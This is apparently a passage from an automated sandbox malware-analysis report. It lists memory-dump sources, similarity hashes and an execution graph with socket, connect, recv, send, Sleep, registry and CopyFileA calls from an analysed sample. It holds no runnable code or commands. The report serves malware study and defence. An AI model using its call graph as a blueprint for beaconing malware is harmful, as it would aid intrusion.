                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4283191376
                                    • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                    • Instruction ID: ffa540413da282c4b4696de238939cccdc77591fed06bc650561c6b7484536b6
                                    • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                    • Instruction Fuzzy Hash: C4F06D66808F8482D211DF18E4002ABB7B0FF9E789F615327EBC936664DF3DD1528710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4064033741
                                    • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                    • Instruction ID: 27b4fe5c1fc3326422d0a83302b1d0e495bd0428680a08f7df9c7bfeca617746
                                    • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                    • Instruction Fuzzy Hash: 40F06D66808F8482D211DF18E4002ABB7B0FF9E789F615327EBC936664DF3DD1528710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2713391170
                                    • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                    • Instruction ID: 0c056f0e48caf8113c863523efa33019f111c37c749428a935e6d396814b9ee1
                                    • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                    • Instruction Fuzzy Hash: CEF06D66808F8482D251DF18E4002ABB7B0FF9E789F615327EBC936664DF3DD1569700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2468659920
                                    • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                    • Instruction ID: 60d275cb8a7aeec0e7ce933da763dc2b146a509489dd3244f7af712ea826125e
                                    • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                    • Instruction Fuzzy Hash: 6DF01966808F8482D2119F18E4002ABB7B0FF9E789F615327EFC82A664DF3DD5528B00
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.1546689137.00007FF70BD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF70BD10000, based on PE: true
                                    • Associated: 00000012.00000002.1546657188.00007FF70BD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1546713788.00007FF70BD20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1546713788.00007FF70C31C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1550262942.00007FF70C72E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1550288396.00007FF70C736000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1550288396.00007FF70C738000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1550330294.00007FF70C739000.00000008.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000012.00000002.1550351839.00007FF70C73C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff70bd10000_yhar2he6rpt6n0h1w6rh.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                    • Instruction ID: cd1beba6171c46b160d8f1b6ab330e886e55fe349c11fb280a897590ed2d8214
                                    • Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                    • Instruction Fuzzy Hash: 1FB09220A18A4188E2043F169C41258A6206F48710F801430C50C12362CB6C50814B20

                                    Execution Graph

                                    Execution Coverage:6.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.2%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:38
                                    execution_graph 59257 7ffb23b0605a 59264 7ffb23b06065 59257->59264 59258 7ffb23b0616e 59259 7ffb23b0617b 59258->59259 59324 7ffb23b014c5 59258->59324 59261 7ffb23b0608d Sleep 59261->59264 59264->59258 59264->59261 59265 7ffb23b06142 Sleep 59264->59265 59266 7ffb23b014c5 10 API calls 59264->59266 59268 7ffb23b0612e memcpy 59264->59268 59269 7ffb23b0175c socket 59264->59269 59304 7ffb23b01c0a 59264->59304 59315 7ffb23b05f90 59264->59315 59265->59264 59266->59264 59268->59264 59270 7ffb23b01793 59269->59270 59271 7ffb23b0195b WSAGetLastError 59269->59271 59272 7ffb23b01797 59270->59272 59273 7ffb23b017b5 59270->59273 59274 7ffb23b077a2 6 API calls 59271->59274 59333 7ffb23b013f9 59272->59333 59277 7ffb23b013f9 8 API calls 59273->59277 59276 7ffb23b0197f 59274->59276 59279 7ffb23b01989 59276->59279 59280 7ffb23b017cf 59276->59280 59281 7ffb23b017b3 59277->59281 59350 7ffb23b077a2 59279->59350 59282 7ffb23b077a2 6 API calls 59280->59282 59300 7ffb23b017c7 59281->59300 59346 7ffb23b0152a setsockopt 59281->59346 59285 7ffb23b017f0 59282->59285 59283 7ffb23b0180e 59288 7ffb23b01813 htonl htons connect 59283->59288 59283->59300 59285->59264 59286 7ffb23b014c5 10 API calls 59286->59280 59290 7ffb23b01851 59288->59290 59291 7ffb23b0186c WSAGetLastError 59288->59291 59292 7ffb23b013f9 8 API calls 59290->59292 59293 7ffb23b0192e WSAGetLastError 59291->59293 59294 7ffb23b0187d 59291->59294 59297 7ffb23b0185e 59292->59297 59296 7ffb23b077a2 6 API calls 59293->59296 59295 7ffb23b01885 select 59294->59295 59294->59300 59298 7ffb23b018e6 59295->59298 59299 7ffb23b01910 59295->59299 59296->59300 59297->59276 59297->59300 59298->59290 59301 7ffb23b018ec WSAGetLastError 59298->59301 59302 7ffb23b077a2 6 API calls 59299->59302 59300->59286 59303 7ffb23b077a2 6 API calls 59301->59303 59302->59300 59303->59300 59305 7ffb23b01c98 59304->59305 59306 7ffb23b01c24 59304->59306 59308 7ffb23b077a2 6 API calls 59305->59308 59306->59305 59307 7ffb23b01c29 recv 59306->59307 59309 7ffb23b01c4c WSAGetLastError 59307->59309 59311 7ffb23b01c3f 59307->59311 59310 7ffb23b01c43 59308->59310 59309->59310 59312 7ffb23b01c60 59309->59312 59310->59264 59311->59310 59314 7ffb23b077a2 6 API calls 59311->59314 59313 7ffb23b077a2 6 API calls 59312->59313 59313->59310 59314->59310 59316 7ffb23b05fa8 59315->59316 59317 7ffb23b06052 59315->59317 59316->59317 59369 7ffb23b022f5 59316->59369 59317->59264 59320 7ffb23b06044 LeaveCriticalSection 59320->59317 59321 7ffb23b05fd8 59321->59320 59322 7ffb23b077a2 6 API calls 59321->59322 59372 7ffb23b0bc77 59321->59372 59322->59321 59325 7ffb23b014d9 59324->59325 59332 7ffb23b014d3 59324->59332 59654 7ffb23b01462 shutdown 59325->59654 59328 7ffb23b01509 WSAGetLastError 59331 7ffb23b077a2 6 API calls 59328->59331 59329 7ffb23b014f1 59330 7ffb23b077a2 6 API calls 59329->59330 59330->59332 59331->59332 59332->59259 59334 7ffb23b01409 ioctlsocket 59333->59334 59336 7ffb23b0143d WSAGetLastError 59334->59336 59337 7ffb23b0142c 59334->59337 59338 7ffb23b077a2 6 API calls 59336->59338 59337->59283 59339 7ffb23b01344 setsockopt 59337->59339 59338->59337 59340 7ffb23b01379 setsockopt 59339->59340 59341 7ffb23b013d4 WSAGetLastError 59339->59341 59342 7ffb23b013a5 59340->59342 59343 7ffb23b013af WSAGetLastError 59340->59343 59344 7ffb23b077a2 6 API calls 59341->59344 59342->59281 59345 7ffb23b077a2 6 API calls 59343->59345 59344->59342 59345->59342 59347 7ffb23b01567 59346->59347 59348 7ffb23b01571 WSAGetLastError 59346->59348 59347->59283 59349 7ffb23b077a2 6 API calls 59348->59349 59349->59347 59351 7ffb23b077b0 59350->59351 59361 7ffb23b0eaa0 59351->59361 59354 7ffb23b07837 fwrite fflush 59356 7ffb23b07860 59354->59356 59355 7ffb23b0786c EnterCriticalSection 59357 7ffb23b07886 LeaveCriticalSection 59355->59357 59358 7ffb23b078a3 59355->59358 59356->59285 59357->59354 59359 7ffb23b078dd CopyFileA 59358->59359 59360 7ffb23b07915 59359->59360 59360->59357 59362 7ffb23b0eaae 59361->59362 59363 7ffb23b0eac5 59361->59363 59367 7ffb23b0fb00 fputc 59362->59367 59368 7ffb23b0fb00 fputc 59363->59368 59366 7ffb23b07809 59366->59354 59366->59355 59366->59356 59367->59366 59368->59366 59370 7ffb23b02300 EnterCriticalSection 59369->59370 59371 7ffb23b0230b GetSystemTimeAsFileTime 59369->59371 59370->59321 59371->59370 59373 7ffb23b0bd05 59372->59373 59374 7ffb23b0bc99 59372->59374 59375 7ffb23b0bd0f 59373->59375 59376 7ffb23b0bd20 59373->59376 59381 7ffb23b0bcb0 59374->59381 59437 7ffb23b0689b 59374->59437 59380 7ffb23b022f5 GetSystemTimeAsFileTime 59375->59380 59399 7ffb23b0bcfb 59375->59399 59377 7ffb23b0689b 2 API calls 59376->59377 59377->59399 59383 7ffb23b0be02 59380->59383 59387 7ffb23b0c26f GetProcessHeap HeapAlloc 59381->59387 59388 7ffb23b0c262 59381->59388 59381->59399 59382 7ffb23b0c0d3 59384 7ffb23b0c167 59382->59384 59400 7ffb23b0c118 59382->59400 59467 7ffb23b07400 GetModuleHandleExA 59383->59467 59386 7ffb23b0689b 2 API calls 59384->59386 59391 7ffb23b0c171 59386->59391 59392 7ffb23b0c297 memcpy 59387->59392 59393 7ffb23b0c309 59387->59393 59388->59387 59440 7ffb23b0b910 59391->59440 59419 7ffb23b0c2d7 59392->59419 59396 7ffb23b077a2 6 API calls 59393->59396 59394 7ffb23b0beb8 59397 7ffb23b0bec0 59394->59397 59398 7ffb23b0c039 59394->59398 59436 7ffb23b0c02f 59396->59436 59472 7ffb23b0d3f2 59397->59472 59504 7ffb23b03805 30 API calls 59398->59504 59399->59321 59401 7ffb23b0c142 59400->59401 59402 7ffb23b0c187 59400->59402 59406 7ffb23b0c14c 59401->59406 59407 7ffb23b0c196 59401->59407 59446 7ffb23b0b9f4 59402->59446 59411 7ffb23b0689b 2 API calls 59406->59411 59409 7ffb23b0689b 2 API calls 59407->59409 59413 7ffb23b0c1a0 59409->59413 59410 7ffb23b0c06c 59410->59397 59411->59399 59412 7ffb23b0befe 59499 7ffb23b068e2 8 API calls 59412->59499 59413->59399 59418 7ffb23b022f5 GetSystemTimeAsFileTime 59413->59418 59414 7ffb23b0c2ed GetProcessHeap HeapFree 59414->59399 59415 7ffb23b0c08c memcpy 59415->59412 59417 7ffb23b0bf08 59500 7ffb23b06a68 10 API calls 59417->59500 59420 7ffb23b0c1fd 59418->59420 59426 7ffb23b0c2df 59419->59426 59506 7ffb23b0bc0e 8 API calls 59419->59506 59421 7ffb23b0689b 2 API calls 59420->59421 59424 7ffb23b0c20f 59421->59424 59505 7ffb23b061a2 13 API calls 59424->59505 59425 7ffb23b0bf3d 59501 7ffb23b09370 58 API calls 59425->59501 59426->59399 59426->59414 59430 7ffb23b0bfa9 59431 7ffb23b0bfd0 59430->59431 59502 7ffb23b01290 7 API calls 59430->59502 59432 7ffb23b0c000 59431->59432 59433 7ffb23b0bfe9 GetProcessHeap HeapFree 59431->59433 59503 7ffb23b061a2 13 API calls 59432->59503 59433->59432 59436->59399 59438 7ffb23b068a6 59437->59438 59439 7ffb23b068b1 QueryPerformanceFrequency QueryPerformanceCounter 59437->59439 59438->59381 59438->59382 59439->59438 59441 7ffb23b0b93d 59440->59441 59442 7ffb23b0b920 59440->59442 59443 7ffb23b014c5 10 API calls 59441->59443 59445 7ffb23b0b954 59441->59445 59442->59441 59507 7ffb23b0b482 59442->59507 59443->59445 59445->59399 59447 7ffb23b0ba08 59446->59447 59449 7ffb23b0bb8c 59446->59449 59447->59449 59450 7ffb23b0ba2d 59447->59450 59448 7ffb23b0ba66 59448->59399 59449->59448 59451 7ffb23b0175c 27 API calls 59449->59451 59452 7ffb23b0ba37 59450->59452 59453 7ffb23b0ba89 59450->59453 59455 7ffb23b0bbc3 59451->59455 59456 7ffb23b0bb10 59452->59456 59457 7ffb23b0ba44 59452->59457 59552 7ffb23b0b501 59453->59552 59455->59448 59461 7ffb23b0689b 2 API calls 59455->59461 59591 7ffb23b0b30e 48 API calls 59456->59591 59457->59448 59590 7ffb23b0b800 68 API calls 59457->59590 59460 7ffb23b0bb1c 59460->59448 59465 7ffb23b0689b 2 API calls 59460->59465 59461->59448 59463 7ffb23b0689b 2 API calls 59463->59448 59464 7ffb23b0ba5e 59464->59448 59466 7ffb23b0689b 2 API calls 59464->59466 59465->59448 59466->59448 59468 7ffb23b07428 59467->59468 59469 7ffb23b07432 GetLastError 59467->59469 59471 7ffb23b05ec9 12 API calls 59468->59471 59470 7ffb23b077a2 6 API calls 59469->59470 59470->59468 59471->59394 59473 7ffb23b0d41b 59472->59473 59495 7ffb23b0d47a 59472->59495 59475 7ffb23b0d4dd 59473->59475 59476 7ffb23b0d424 59473->59476 59474 7ffb23b077a2 6 API calls 59498 7ffb23b0d4d3 59474->59498 59479 7ffb23b077a2 6 API calls 59475->59479 59477 7ffb23b0d42d 59476->59477 59478 7ffb23b0d510 59476->59478 59481 7ffb23b0d543 59477->59481 59482 7ffb23b0d436 RegOpenKeyExA 59477->59482 59480 7ffb23b077a2 6 API calls 59478->59480 59479->59498 59480->59498 59485 7ffb23b077a2 6 API calls 59481->59485 59483 7ffb23b0d45d 59482->59483 59484 7ffb23b0d576 RegQueryValueExA 59482->59484 59486 7ffb23b077a2 6 API calls 59483->59486 59496 7ffb23b0d5a4 59484->59496 59497 7ffb23b0d5f7 RegCloseKey 59484->59497 59485->59498 59486->59495 59487 7ffb23b0d6d6 59490 7ffb23b0d89c 59487->59490 59493 7ffb23b077a2 6 API calls 59487->59493 59488 7ffb23b0d879 59491 7ffb23b077a2 6 API calls 59488->59491 59492 7ffb23b0beec 59491->59492 59492->59412 59492->59415 59493->59492 59494 7ffb23b077a2 6 API calls 59494->59496 59495->59474 59495->59498 59496->59494 59496->59497 59497->59498 59498->59487 59498->59488 59499->59417 59500->59425 59501->59430 59502->59431 59503->59436 59504->59410 59505->59399 59506->59426 59508 7ffb23b0b490 59507->59508 59514 7ffb23b0b49e 59507->59514 59515 7ffb23b0b456 59508->59515 59513 7ffb23b014c5 10 API calls 59513->59514 59514->59441 59516 7ffb23b0b463 59515->59516 59517 7ffb23b0b46d 59515->59517 59516->59517 59518 7ffb23b014c5 10 API calls 59516->59518 59517->59514 59519 7ffb23b0afb0 59517->59519 59518->59517 59521 7ffb23b0afdf 59519->59521 59520 7ffb23b0eaa0 fputc 59520->59521 59521->59520 59522 7ffb23b0b044 59521->59522 59523 7ffb23b0b0a1 GetProcessHeap HeapAlloc 59521->59523 59524 7ffb23b0aff3 GetProcessHeap HeapReAlloc 59521->59524 59525 7ffb23b077a2 6 API calls 59522->59525 59523->59521 59526 7ffb23b0b0c5 59523->59526 59524->59521 59527 7ffb23b0b0dd 59524->59527 59528 7ffb23b0b05a strlen 59525->59528 59529 7ffb23b077a2 6 API calls 59526->59529 59530 7ffb23b077a2 6 API calls 59527->59530 59538 7ffb23b0af98 59528->59538 59532 7ffb23b0b0db 59529->59532 59533 7ffb23b0b0f3 59530->59533 59536 7ffb23b0b10f 59532->59536 59533->59536 59537 7ffb23b0b0f8 GetProcessHeap HeapFree 59533->59537 59535 7ffb23b0b080 GetProcessHeap HeapFree 59535->59536 59536->59513 59537->59536 59541 7ffb23b01cbd 59538->59541 59542 7ffb23b01ce8 59541->59542 59543 7ffb23b01d6c 59541->59543 59542->59543 59549 7ffb23b01ced 59542->59549 59544 7ffb23b077a2 6 API calls 59543->59544 59546 7ffb23b01d40 59544->59546 59545 7ffb23b01cf6 send 59548 7ffb23b01d1a WSAGetLastError 59545->59548 59545->59549 59546->59535 59546->59536 59547 7ffb23b01d39 59547->59546 59551 7ffb23b077a2 6 API calls 59547->59551 59550 7ffb23b077a2 6 API calls 59548->59550 59549->59545 59549->59547 59550->59547 59551->59546 59553 7ffb23b0b536 59552->59553 59561 7ffb23b0b7c0 59552->59561 59554 7ffb23b0b5a5 59553->59554 59555 7ffb23b0b591 strlen 59553->59555 59592 7ffb23b0275a 59554->59592 59555->59554 59578 7ffb23b0b673 59555->59578 59559 7ffb23b0b482 21 API calls 59559->59561 59561->59448 59561->59463 59562 7ffb23b0afb0 17 API calls 59563 7ffb23b0b614 59562->59563 59563->59578 59601 7ffb23b0b217 59563->59601 59567 7ffb23b0b659 59568 7ffb23b0b65d 59567->59568 59609 7ffb23b0ab26 strcmp 59567->59609 59568->59578 59608 7ffb23b0ab8d 6 API calls 59568->59608 59570 7ffb23b0b6ab 59572 7ffb23b0b6b7 strlen 59570->59572 59570->59578 59573 7ffb23b0b6cb 59572->59573 59572->59578 59573->59568 59574 7ffb23b0b6da strcpy 59573->59574 59610 7ffb23b0ab8d 6 API calls 59574->59610 59576 7ffb23b0b6ee 59577 7ffb23b0afb0 17 API calls 59576->59577 59579 7ffb23b0b6fd 59577->59579 59578->59559 59578->59561 59579->59578 59580 7ffb23b0b217 29 API calls 59579->59580 59581 7ffb23b0b70d 59580->59581 59581->59578 59611 7ffb23b0aa20 strcmp strcmp strcmp strcmp 59581->59611 59583 7ffb23b0b73b 59583->59568 59590->59464 59591->59460 59593 7ffb23b02776 59592->59593 59594 7ffb23b027b2 59592->59594 59593->59594 59614 7ffb23b0273a rand_s 59593->59614 59596 7ffb23b0b2da 59594->59596 59615 7ffb23b0af6a 59596->59615 59598 7ffb23b0b2ff 59598->59562 59598->59578 59641 7ffb23b0b132 59601->59641 59604 7ffb23b0b232 59650 7ffb23b0ad36 25 API calls 59604->59650 59605 7ffb23b0b23c 59605->59578 59607 7ffb23b0aa20 strcmp strcmp strcmp strcmp 59605->59607 59607->59567 59608->59578 59609->59570 59610->59576 59611->59583 59614->59593 59616 7ffb23b0175c 27 API calls 59615->59616 59617 7ffb23b0af77 59616->59617 59618 7ffb23b0af80 59617->59618 59634 7ffb23b01596 setsockopt 59617->59634 59618->59598 59620 7ffb23b0b24b 59618->59620 59621 7ffb23b0afb0 17 API calls 59620->59621 59622 7ffb23b0b260 59621->59622 59623 7ffb23b0b2a9 59622->59623 59624 7ffb23b0b217 29 API calls 59622->59624 59626 7ffb23b014c5 10 API calls 59623->59626 59625 7ffb23b0b26c 59624->59625 59638 7ffb23b0aa20 strcmp strcmp strcmp strcmp 59625->59638 59627 7ffb23b0b2b6 59626->59627 59629 7ffb23b0b2a4 59627->59629 59640 7ffb23b0ab8d 6 API calls 59627->59640 59629->59598 59630 7ffb23b0b298 59630->59623 59632 7ffb23b0b29c 59630->59632 59639 7ffb23b0ab8d 6 API calls 59632->59639 59635 7ffb23b015d5 WSAGetLastError 59634->59635 59636 7ffb23b015cb 59634->59636 59637 7ffb23b077a2 6 API calls 59635->59637 59636->59618 59637->59636 59638->59630 59639->59629 59640->59629 59642 7ffb23b0b15a 59641->59642 59649 7ffb23b0b172 59641->59649 59643 7ffb23b0b163 memset 59642->59643 59642->59649 59644 7ffb23b0b17c 59643->59644 59646 7ffb23b0b1aa strchr 59644->59646 59644->59649 59651 7ffb23b0b124 59644->59651 59646->59644 59647 7ffb23b0b1c1 59646->59647 59648 7ffb23b077a2 6 API calls 59647->59648 59648->59649 59649->59604 59649->59605 59650->59605 59652 7ffb23b01c0a 8 API calls 59651->59652 59653 7ffb23b0b12d 59652->59653 59653->59644 59655 7ffb23b01499 WSAGetLastError 59654->59655 59656 7ffb23b0147b 59654->59656 59657 7ffb23b014a6 59655->59657 59660 7ffb23b01491 closesocket 59655->59660 59658 7ffb23b077a2 6 API calls 59656->59658 59659 7ffb23b077a2 6 API calls 59657->59659 59658->59660 59659->59660 59660->59328 59660->59329 59661 7ffb2270135a 59670 7ffb22701365 59661->59670 59662 7ffb2270146e 59666 7ffb2270147b 59662->59666 59728 7ffb227057a5 10 API calls 59662->59728 59665 7ffb2270138d Sleep 59665->59670 59668 7ffb22701442 Sleep 59668->59670 59669 7ffb227057a5 10 API calls 59669->59670 59670->59662 59670->59665 59670->59668 59670->59669 59672 7ffb2270142e memcpy 59670->59672 59673 7ffb22705a3c socket 59670->59673 59708 7ffb22705eea 59670->59708 59719 7ffb22701290 59670->59719 59672->59670 59674 7ffb22705a73 59673->59674 59675 7ffb22705c3b WSAGetLastError 59673->59675 59677 7ffb22705a77 59674->59677 59678 7ffb22705a95 59674->59678 59676 7ffb227040d2 6 API calls 59675->59676 59679 7ffb22705c5f 59676->59679 59729 7ffb227056d9 59677->59729 59680 7ffb227056d9 8 API calls 59678->59680 59682 7ffb22705c69 59679->59682 59683 7ffb22705aaf 59679->59683 59684 7ffb22705a93 59680->59684 59746 7ffb227040d2 59682->59746 59688 7ffb227040d2 6 API calls 59683->59688 59707 7ffb22705aa7 59684->59707 59742 7ffb2270580a setsockopt 59684->59742 59686 7ffb22705aee 59693 7ffb22705af3 htonl htons connect 59686->59693 59686->59707 59690 7ffb22705ad0 59688->59690 59690->59670 59694 7ffb22705b31 59693->59694 59695 7ffb22705b4c WSAGetLastError 59693->59695 59696 7ffb227056d9 8 API calls 59694->59696 59697 7ffb22705c0e WSAGetLastError 59695->59697 59698 7ffb22705b5d 59695->59698 59699 7ffb22705b3e 59696->59699 59701 7ffb227040d2 6 API calls 59697->59701 59700 7ffb22705b65 select 59698->59700 59698->59707 59699->59679 59699->59707 59702 7ffb22705bc6 59700->59702 59703 7ffb22705bf0 59700->59703 59701->59707 59702->59694 59704 7ffb22705bcc WSAGetLastError 59702->59704 59705 7ffb227040d2 6 API calls 59703->59705 59706 7ffb227040d2 6 API calls 59704->59706 59705->59707 59706->59707 59757 7ffb227057a5 10 API calls 59707->59757 59709 7ffb22705f78 59708->59709 59710 7ffb22705f04 59708->59710 59712 7ffb227040d2 6 API calls 59709->59712 59710->59709 59711 7ffb22705f09 recv 59710->59711 59713 7ffb22705f1f 59711->59713 59714 7ffb22705f2c WSAGetLastError 59711->59714 59718 7ffb22705f23 59712->59718 59717 7ffb227040d2 6 API calls 59713->59717 59713->59718 59715 7ffb22705f40 59714->59715 59714->59718 59716 7ffb227040d2 6 API calls 59715->59716 59716->59718 59717->59718 59718->59670 59720 7ffb22701352 59719->59720 59721 7ffb227012a8 59719->59721 59720->59670 59721->59720 59766 7ffb22709395 59721->59766 59724 7ffb22701344 LeaveCriticalSection 59724->59720 59725 7ffb227012d8 59725->59724 59726 7ffb227040d2 6 API calls 59725->59726 59769 7ffb2270e1cc 59725->59769 59726->59725 59728->59666 59730 7ffb227056e9 ioctlsocket 59729->59730 59732 7ffb2270571d WSAGetLastError 59730->59732 59733 7ffb2270570c 59730->59733 59734 7ffb227040d2 6 API calls 59732->59734 59733->59686 59735 7ffb22705624 setsockopt 59733->59735 59734->59733 59736 7ffb22705659 setsockopt 59735->59736 59737 7ffb227056b4 WSAGetLastError 59735->59737 59738 7ffb22705685 59736->59738 59739 7ffb2270568f WSAGetLastError 59736->59739 59740 7ffb227040d2 6 API calls 59737->59740 59738->59684 59741 7ffb227040d2 6 API calls 59739->59741 59740->59738 59741->59738 59743 7ffb22705851 WSAGetLastError 59742->59743 59745 7ffb22705847 59742->59745 59744 7ffb227040d2 6 API calls 59743->59744 59744->59745 59745->59686 59747 7ffb227040e0 59746->59747 59758 7ffb2270eea0 59747->59758 59749 7ffb22704190 59749->59690 59751 7ffb22704167 fwrite fflush 59751->59749 59752 7ffb2270419c EnterCriticalSection 59753 7ffb227041b6 LeaveCriticalSection 59752->59753 59754 7ffb227041d3 59752->59754 59753->59751 59755 7ffb2270420d CopyFileA 59754->59755 59756 7ffb22704245 59755->59756 59756->59753 59757->59683 59759 7ffb2270eeae 59758->59759 59760 7ffb2270eec5 59758->59760 59764 7ffb2270ff00 fputc 59759->59764 59765 7ffb2270ff00 fputc 59760->59765 59763 7ffb22704139 59763->59749 59763->59751 59763->59752 59764->59763 59765->59763 59767 7ffb227093ab GetSystemTimeAsFileTime 59766->59767 59768 7ffb227012bb EnterCriticalSection 59766->59768 59767->59768 59768->59725 59770 7ffb2270e1fc 59769->59770 59805 7ffb2270e246 59769->59805 59771 7ffb2270e351 59770->59771 59772 7ffb2270e20a 59770->59772 59821 7ffb2270dad2 70 API calls 59771->59821 59773 7ffb2270e2be 59772->59773 59774 7ffb2270e210 59772->59774 59776 7ffb2270e2c5 59773->59776 59777 7ffb2270e306 59773->59777 59778 7ffb2270e21b 59774->59778 59779 7ffb2270e35f 59774->59779 59776->59805 59818 7ffb2270d748 57 API calls 59776->59818 59782 7ffb2270e30d 59777->59782 59783 7ffb2270e34a 59777->59783 59780 7ffb2270e21d 59778->59780 59781 7ffb2270e270 59778->59781 59823 7ffb2270df3e 56 API calls 59779->59823 59788 7ffb2270e224 59780->59788 59789 7ffb2270e255 59780->59789 59786 7ffb2270e27b 59781->59786 59787 7ffb2270e358 59781->59787 59782->59805 59811 7ffb2270d1db 59782->59811 59820 7ffb2270d822 52 API calls 59783->59820 59790 7ffb2270e27d 59786->59790 59791 7ffb2270e2a3 59786->59791 59822 7ffb2270dd0a 53 API calls 59787->59822 59793 7ffb2270e36d 59788->59793 59794 7ffb2270e22f 